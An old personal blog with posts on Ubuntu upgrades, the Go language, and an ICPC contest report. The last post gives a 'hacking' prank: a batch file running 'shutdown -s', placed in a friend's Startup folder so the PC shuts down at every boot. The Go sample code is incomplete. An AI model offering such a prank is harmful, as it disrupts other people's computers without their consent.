Monday, November 30, 2009

Upgrade ubuntu to newer version

(1) To update ubuntu 8.04 to 8.10

Follow the steps in this link

(2) To update ubuntu 8.10 to 9.04

Follow the steps in this link

(3) To update ubuntu 9.04 to 9.10

NOTE:You can only directly upgrade to Ubuntu 9.10 from Ubuntu 9.04

Follow the steps in this link

Ubuntu Version Names

1)8.04----->Hardy Heron
3)9.04----->Jaunty Jackalope
4)9.10----->Karmic Koala

Wednesday, November 11, 2009

Everyone here after Go to "GO" Programming Language

Hi friends when i googling i come to know about "GO"
What is Go?
        It is a programming language like c,c++.
        This programming environment is fast, productive, and most importantly, fun.
        It is a open source an experimental new language called Go  combines the development speed of working in a dynamic language like Python with the performance and safety of a compiled language like C or C++. Typical builds feel instantaneous; even large binaries compile in just a few seconds. And the compiled code runs close to the speed of C. Go lets you move fast.

Go is a great language for systems programming with support for multi-processing, a fresh and lightweight take on object-oriented design, plus some cool features like true closures and reflection.

Want to write a server with thousands of communicating threads? Want to spend less time reading blogs while waiting for builds? Feel like whipping up a prototype of your latest idea? Go is the way to go! Check out the video for more information or visit

To install go in linux
sudo apt-get install bison gcc libc6-dev ed
Sample Prgoram
$ cat >hello.go <
package main

import "fmt"

func main() {
 fmt.Printf("hello, world\n")
$ 6g hello.go
$ 6l hello.6
$ ./6.out
hello, world

Tuesday, November 10, 2009

TeckMonks In "Battle Of Brain"

Hi friends this year we threee went to kerala "Amrita University" for acm ICPC(International Collegiate Programming Contest) Team Name as "Teck Monks" which held on nov 1st...This year they asked 9 problems...It was more ambiguity...

Team "Oasis" from South Korea's Sogang University took first place at the Amritapuri regional contest, held Nov. 1 at Amrita Vishwa Vidyapeetham University.

"Oasis" solved seven problems correctly, the only team to do so. "CounterGambit," from India's National Institute of Technology, Trichy, took second place, mirroring their finish in the Gwalior/Kanpur regional contest a month before; they solved six problems correctly. "Phoenix," from the DJ Sanghvi College of Engineering in Mumbai, came in third.

Four teams from the Indian Institute of Technology representing schools in Guwahati, Bombay, Roorkee and Chennai placed in the top 10. Fifty-six teams from five countries participated in the contest, which was directed by Professor Vallath Nandakumar.

Professor Nandakumar noted in his report that the organizers took contest participants on a sightseeing tour of the Kerala countryside, visiting the area beaches and the Palaruvi waterfalls and capping the trip off with a banquet dinner and an show of cultural dances.

Photos of the contest can be found here. The full director's report is here (pdf). The contest's blog is here. Follow them on Twitter @icpcamritapuri.

Saturday, November 7, 2009


Now a days i have little bit interesting in hacking and cracking
this is not my profession just i would like to share this with u

Here is a tips to make computer restart again and again after every 30 seconds

This is the preocedure note pad

2.type "shutdown -s" with out quotes the file with .bat extension

4.explaination,u have created a prog which shutdowns the pc with in 30
of executing the file

5. now open "x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\" (x->is the drive on which ur windows has been installed and USERNAME is the username)

6.paste a shortcut on this directory

NOW WHEN EVER UR FRIEND STARTS HIS PC a count down will start after 30 sec his pc will shutdown
u can also maki his pc restart instead of shutting down.. just replace "shutdown -s" "restart _s"

enjoy.... this is not a virus but look so....